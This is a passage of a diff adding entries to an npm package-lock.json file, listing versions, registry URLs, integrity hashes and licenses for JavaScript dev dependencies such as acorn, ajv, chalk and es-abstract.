"sha512-C3ZAHugKgovV5YvAMsxhq0gtXuwESUKc5MhEtjBpLoHPLYM+iuwSj3lflFwK3DPm68660rZ7G8BMcwSro7hD5w==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-linux-x64-musl": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-linux-x64-musl/-/resolver-binding-linux-x64-musl-1.11.1.tgz", + "integrity": "sha512-rV0YSoyhK2nZ4vEswT/QwqzqQXw5I6CjoaYMOX0TqBlWhojUf8P94mvI7nuJTeaCkkds3QE4+zS8Ko+GdXuZtA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@unrs/resolver-binding-wasm32-wasi": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-wasm32-wasi/-/resolver-binding-wasm32-wasi-1.11.1.tgz", + "integrity": "sha512-5u4RkfxJm+Ng7IWgkzi3qrFOvLvQYnPBmjmZQ8+szTK/b31fQCnleNl1GgEt7nIsZRIf5PLhPwT0WM+q45x/UQ==", + "cpu": [ + "wasm32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "dependencies": { + "@napi-rs/wasm-runtime": "^0.2.11" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@unrs/resolver-binding-win32-arm64-msvc": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-win32-arm64-msvc/-/resolver-binding-win32-arm64-msvc-1.11.1.tgz", + "integrity": "sha512-nRcz5Il4ln0kMhfL8S3hLkxI85BXs3o8EYoattsJNdsX4YUU89iOkVn7g0VHSRxFuVMdM4Q1jEpIId1Ihim/Uw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@unrs/resolver-binding-win32-ia32-msvc": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-win32-ia32-msvc/-/resolver-binding-win32-ia32-msvc-1.11.1.tgz", + "integrity": "sha512-DCEI6t5i1NmAZp6pFonpD5m7i6aFrpofcp4LA2i8IIq60Jyo28hamKBxNrZcyOwVOZkgsRp9O2sXWBWP8MnvIQ==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@unrs/resolver-binding-win32-x64-msvc": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/@unrs/resolver-binding-win32-x64-msvc/-/resolver-binding-win32-x64-msvc-1.11.1.tgz", + "integrity": "sha512-lrW200hZdbfRtztbygyaq/6jP6AKE8qQN2KvPcJ+x7wiD038YtnYtZ82IMNJ69GJibV7bwL3y9FgK+5w/pYt6g==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/acorn": { + "version": "8.16.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.16.0.tgz", + "integrity": "sha512-UVJyE9MttOsBQIDKw1skb9nAwQuR5wuGD3+82K6JgJlm/Y+KI92oNsMNGZCYdDsVtRHSak0pcV5Dno5+4jh9sw==", + "dev": true, + "license": "MIT", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/acorn-jsx": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", + "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", + "dev": true, + "license": "MIT", + "peerDependencies": { + "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" + } + }, + "node_modules/ajv": { + "version": "6.15.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.15.0.tgz", + "integrity": "sha512-fgFx7Hfoq60ytK2c7DhnF8jIvzYgOMxfugjLOSMHjLIPgenqa7S7oaagATUq99mV6IYvN2tRmC0wnTYX6iPbMw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "fast-json-stable-stringify": "^2.0.0", + "json-schema-traverse": "^0.4.1", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", + "dev": true, + "license": "Python-2.0" + }, + "node_modules/aria-query": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.3.2.tgz", + "integrity": "sha512-COROpnaoap1E2F000S62r6A60uHZnmlvomhfyT2DlTcrY1OrBKn2UhH7qn5wTC9zMvD0AY7csdPSNwKP+7WiQw==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/array-buffer-byte-length": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/array-buffer-byte-length/-/array-buffer-byte-length-1.0.2.tgz", + "integrity": "sha512-LHE+8BuR7RYGDKvnrmcuSq3tDcKv9OFEXQt/HpbZhY7V6h0zlUXutnAD82GiFx9rdieCMjkvtcsPqBwgUl1Iiw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "is-array-buffer": "^3.0.5" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array-includes": { + "version": "3.1.9", + "resolved": "https://registry.npmjs.org/array-includes/-/array-includes-3.1.9.tgz", + "integrity": "sha512-FmeCCAenzH0KH381SPT5FZmiA/TmpndpcaShhfgEN9eCVjnFBqq3l1xrI42y8+PPLI6hypzou4GXw00WHmPBLQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.4", + "define-properties": "^1.2.1", + "es-abstract": "^1.24.0", + "es-object-atoms": "^1.1.1", + "get-intrinsic": "^1.3.0", + "is-string": "^1.1.1", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array.prototype.findlast": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/array.prototype.findlast/-/array.prototype.findlast-1.2.5.tgz", + "integrity": "sha512-CVvd6FHg1Z3POpBLxO6E6zr+rSKEQ9L6rZHAaY7lLfhKsWYUBBOuMs0e9o24oopj6H+geRCX0YJ+TJLBK2eHyQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.2", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.0.0", + "es-shim-unscopables": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array.prototype.findlastindex": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/array.prototype.findlastindex/-/array.prototype.findlastindex-1.2.6.tgz", + "integrity": "sha512-F/TKATkzseUExPlfvmwQKGITM3DGTK+vkAsCZoDc5daVygbJBnjEUCbgkAvVFsgfXfX4YIqZ/27G3k3tdXrTxQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.4", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.9", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "es-shim-unscopables": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array.prototype.flat": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/array.prototype.flat/-/array.prototype.flat-1.3.3.tgz", + "integrity": "sha512-rwG/ja1neyLqCuGZ5YYrznA62D4mZXg0i1cIskIUKSiqF3Cje9/wXAls9B9s1Wa2fomMsIv8czB8jZcPmxCXFg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.5", + "es-shim-unscopables": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array.prototype.flatmap": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/array.prototype.flatmap/-/array.prototype.flatmap-1.3.3.tgz", + "integrity": "sha512-Y7Wt51eKJSyi80hFrJCePGGNo5ktJCslFuboqJsbf57CCPcm5zztluPlc4/aD8sWsKvlwatezpV4U1efk8kpjg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.5", + "es-shim-unscopables": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array.prototype.tosorted": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/array.prototype.tosorted/-/array.prototype.tosorted-1.1.4.tgz", + "integrity": "sha512-p6Fx8B7b7ZhL/gmUsAy0D15WhvDccw3mnGNbZpi3pmeJdxtWsj2jEaI4Y6oo3XiHfzuSgPwKc04MYt6KgvC/wA==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.3", + "es-errors": "^1.3.0", + "es-shim-unscopables": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/arraybuffer.prototype.slice": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/arraybuffer.prototype.slice/-/arraybuffer.prototype.slice-1.0.4.tgz", + "integrity": "sha512-BNoCY6SXXPQ7gF2opIP4GBE+Xw7U+pHMYKuzjgCN3GwiaIR09UUeKfheyIry77QtrCBlC0KK0q5/TER/tYh3PQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "array-buffer-byte-length": "^1.0.1", + "call-bind": "^1.0.8", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.5", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "is-array-buffer": "^3.0.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/ast-types-flow": { + "version": "0.0.8", + "resolved": "https://registry.npmjs.org/ast-types-flow/-/ast-types-flow-0.0.8.tgz", + "integrity": "sha512-OH/2E5Fg20h2aPrbe+QL8JZQFko0YZaF+j4mnQ7BGhfavO7OpSLa8a0y9sBwomHdSbkhTS8TQNayBfnW5DwbvQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/async-function": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/async-function/-/async-function-1.0.0.tgz", + "integrity": "sha512-hsU18Ae8CDTR6Kgu9DYf0EbCr/a5iGL0rytQDobUcdpYOKokk8LEjVphnXkDkgpi0wYVsqrXuP0bZxJaTqdgoA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/available-typed-arrays": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/available-typed-arrays/-/available-typed-arrays-1.0.7.tgz", + "integrity": "sha512-wvUjBtSGN7+7SjNpq/9M2Tg350UZD3q62IFZLbRAR1bSMlCo1ZaeW+BJ+D090e4hIIZLBcTDWe4Mh4jvUDajzQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "possible-typed-array-names": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/axe-core": { + "version": "4.11.3", + "resolved": "https://registry.npmjs.org/axe-core/-/axe-core-4.11.3.tgz", + "integrity": "sha512-zBQouZixDTbo3jMGqHKyePxYxr1e5W8UdTmBQ7sNtaA9M2bE32daxxPLS/jojhKOHxQ7LWwPjfiwf/fhaJWzlg==", + "dev": true, + "license": "MPL-2.0", + "engines": { + "node": ">=4" + } + }, + "node_modules/axobject-query": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/axobject-query/-/axobject-query-4.1.0.tgz", + "integrity": "sha512-qIj0G9wZbMGNLjLmg1PT6v2mE9AH2zlnADJD/2tC6E00hgmhUOfEB6greHPAfLRSufHqROIUTkw6E+M3lH0PTQ==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/balanced-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "dev": true, + "license": "MIT" + }, + "node_modules/brace-expansion": { + "version": "1.1.14", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.14.tgz", + "integrity": "sha512-MWPGfDxnyzKU7rNOW9SP/c50vi3xrmrua/+6hfPbCS2ABNWfx24vPidzvC7krjU/RTo235sV776ymlsMtGKj8g==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "dev": true, + "license": "MIT", + "dependencies": { + "fill-range": "^7.1.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/call-bind": { + "version": "1.0.9", + "resolved": "https://registry.npmjs.org/call-bind/-/call-bind-1.0.9.tgz", + "integrity": "sha512-a/hy+pNsFUTR+Iz8TCJvXudKVLAnz/DyeSUo10I5yvFDQJBFU2s9uqQpoSrJlroHUKoKqzg+epxyP9lqFdzfBQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "get-intrinsic": "^1.3.0", + "set-function-length": "^1.2.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/call-bound": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz", + "integrity": "sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "get-intrinsic": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/callsites": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", + "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/caniuse-lite": { + "version": "1.0.30001791", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001791.tgz", + "integrity": "sha512-yk0l/YSrOnFZk3UROpDLQD9+kC1l4meK/wed583AXrzoarMGJcbRi2Q4RaUYbKxYAsZ8sWmaSa/DsLmdBeI1vQ==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/caniuse-lite" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "CC-BY-4.0" + }, + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/client-only": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/client-only/-/client-only-0.0.1.tgz", + "integrity": "sha512-IV3Ou0jSMzZrd3pZ48nLkT9DA7Ag1pnPzaiQhpW7c3RbcqqzvzzVu+L8gfqMp/8IM2MQtSiqaCxrrcfu8I8rMA==", + "license": "MIT" + }, + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" + } + }, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true, + "license": "MIT" + }, + "node_modules/concat-map": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "dev": true, + "license": "MIT" + }, + "node_modules/cross-spawn": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", + "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "dev": true, + "license": "MIT", + "dependencies": { + "path-key": "^3.1.0", + "shebang-command": "^2.0.0", + "which": "^2.0.1" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/csstype": { + "version": "3.2.3", + "resolved": "https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz", + "integrity": "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==", + "devOptional": true, + "license": "MIT" + }, + "node_modules/damerau-levenshtein": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/damerau-levenshtein/-/damerau-levenshtein-1.0.8.tgz", + "integrity": "sha512-sdQSFB7+llfUcQHUQO3+B8ERRj0Oa4w9POWMI/puGtuf7gFywGmkaLCElnudfTiKZV+NvHqL0ifzdrI8Ro7ESA==", + "dev": true, + "license": "BSD-2-Clause" + }, + "node_modules/data-view-buffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/data-view-buffer/-/data-view-buffer-1.0.2.tgz", + "integrity": "sha512-EmKO5V3OLXh1rtK2wgXRansaK1/mtVdTUEiEI0W8RkvgT05kfxaH29PliLnpLP73yYO6142Q72QNa8Wx/A5CqQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/data-view-byte-length": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/data-view-byte-length/-/data-view-byte-length-1.0.2.tgz", + "integrity": "sha512-tuhGbE6CfTM9+5ANGf+oQb72Ky/0+s3xKUpHvShfiz2RxMFgFPjsXuRLBVMtvMs15awe45SRb83D6wH4ew6wlQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/inspect-js" + } + }, + "node_modules/data-view-byte-offset": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/data-view-byte-offset/-/data-view-byte-offset-1.0.1.tgz", + "integrity": "sha512-BS8PfmtDGnrgYdOonGZQdLZslWIeCGFP9tpan0hi1Co2Zr2NKADsvGYA8XxuG/4UWgJ6Cjtv+YJnB6MM69QGlQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "is-data-view": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/debug": { + "version": "4.4.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/deep-is": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", + "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/define-data-property": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/define-data-property/-/define-data-property-1.1.4.tgz", + "integrity": "sha512-rBMvIzlpA8v6E+SJZoo++HAYqsLrkg7MSfIinMPFhmkorw7X+dOXVJQs+QT69zGkzMyfDnIMN2Wid1+NbL3T+A==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-define-property": "^1.0.0", + "es-errors": "^1.3.0", + "gopd": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/define-properties": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/define-properties/-/define-properties-1.2.1.tgz", + "integrity": "sha512-8QmQKqEASLd5nx0U1B1okLElbUuuttJ/AnYmRXbbbGDWh6uS208EjD4Xqq/I9wK7u0v6O08XhTWnt5XtEbR6Dg==", + "dev": true, + "license": "MIT", + "dependencies": { + "define-data-property": "^1.0.1", + "has-property-descriptors": "^1.0.0", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/detect-libc": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz", + "integrity": "sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==", + "devOptional": true, + "license": "Apache-2.0", + "engines": { + "node": ">=8" + } + }, + "node_modules/doctrine": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-2.1.0.tgz", + "integrity": "sha512-35mSku4ZXK0vfCuHEDAwt55dg2jNajHZ1odvF+8SSr82EsZY4QmXfuWso8oEd8zRhVObSN18aM0CjSdoBX7zIw==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "esutils": "^2.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/emoji-regex": { + "version": "9.2.2", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", + "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==", + "dev": true, + "license": "MIT" + }, + "node_modules/enhanced-resolve": { + "version": "5.21.0", + "resolved": "https://registry.npmjs.org/enhanced-resolve/-/enhanced-resolve-5.21.0.tgz", + "integrity": "sha512-otxSQPw4lkOZWkHpB3zaEQs6gWYEsmX4xQF68ElXC/TWvGxGMSGOvoNbaLXm6/cS/fSfHtsEdw90y20PCd+sCA==", + "dev": true, + "license": "MIT", + "dependencies": { + "graceful-fs": "^4.2.4", + "tapable": "^2.3.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/es-abstract": { + "version": "1.24.2", + "resolved": "https://registry.npmjs.org/es-abstract/-/es-abstract-1.24.2.tgz", + "integrity": "sha512-2FpH9Q5i2RRwyEP1AylXe6nYLR5OhaJTZwmlcP0dL/+JCbgg7yyEo/sEK6HeGZRf3dFpWwThaRHVApXSkW3xeg==", + "dev": true, + "license": "MIT", + "dependencies": { + "array-buffer-byte-length": "^1.0.2", + "arraybuffer.prototype.slice": "^1.0.4", + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.8", + "call-bound": "^1.0.4", + "data-view-buffer": "^1.0.2", + "data-view-byte-length": "^1.0.2", + "data-view-byte-offset": "^1.0.1", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "es-set-tostringtag": "^2.1.0", + "es-to-primitive": "^1.3.0", + "function.prototype.name": "^1.1.8", + "get-intrinsic": "^1.3.0", + "get-proto": "^1.0.1", + "get-symbol-description": "^1.1.0", + "globalthis": "^1.0.4", + "gopd": "^1.2.0", + "has-property-descriptors": "^1.0.2", + "has-proto": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "internal-slot": "^1.1.0", + "is-array-buffer": "^3.0.5", + "is-callable": "^1.2.7", + "is-data-view": "^1.0.2", + "is-negative-zero": "^2.0.3", + "is-regex": "^1.2.1", + "is-set": "^2.0.3", + "is-shared-array-buffer": "^1.0.4", + "is-string": "^1.1.1", + "is-typed-array": "^1.1.15", + "is-weakref": "^1.1.1", + "math-intrinsics": "^1.1.0", + "object-inspect": "^1.13.4", + "object-keys": "^1.1.1", + "object.assign": "^4.1.7", + "own-keys": "^1.0.1", + "regexp.prototype.flags": "^1.5.4", + "safe-array-concat": "^1.1.3", + "safe-push-apply": "^1.0.0", + "safe-regex-test": "^1.1.0", + "set-proto": "^1.0.0", + "stop-iteration-iterator": "^1.1.0", + "string.prototype.trim": "^1.2.10", + "string.prototype.trimend": "^1.0.9", + "string.prototype.trimstart": "^1.0.8", + "typed-array-buffer": "^1.0.3", + "typed-array-byte-length": "^1.0.3", + "typed-array-byte-offset": "^1.0.4", + "typed-array-length": "^1.0.7", + "unbox-primitive": "^1.1.0", + "which-typed-array": "^1.1.19" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-iterator-helpers": { + "version": "1.3.2", + "resolved": 